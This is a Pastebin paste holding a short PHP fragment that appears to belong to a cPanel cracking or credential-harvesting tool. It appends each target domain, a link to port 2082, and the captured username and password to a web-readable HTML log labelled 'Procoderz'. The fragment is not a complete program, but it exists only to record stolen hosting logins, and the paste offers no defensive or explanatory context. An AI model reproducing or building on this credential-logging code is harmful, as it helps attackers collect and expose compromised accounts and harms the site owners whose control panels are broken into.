Advertisement
dragondevile

Untitled

Jun 16th, 2016
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3.  
  4.  
  5. $fp = fopen("../8.html", 'a+');
  6.                 fwrite($fp, "".$count++."-  </td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>  
  7.        Procoderz user is (<b><font color=green>".$owner['name']."</font></b>) Password is (<b><font color=green>".$password."</font></b>)<br />");
  8.    
  9.  
  10. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement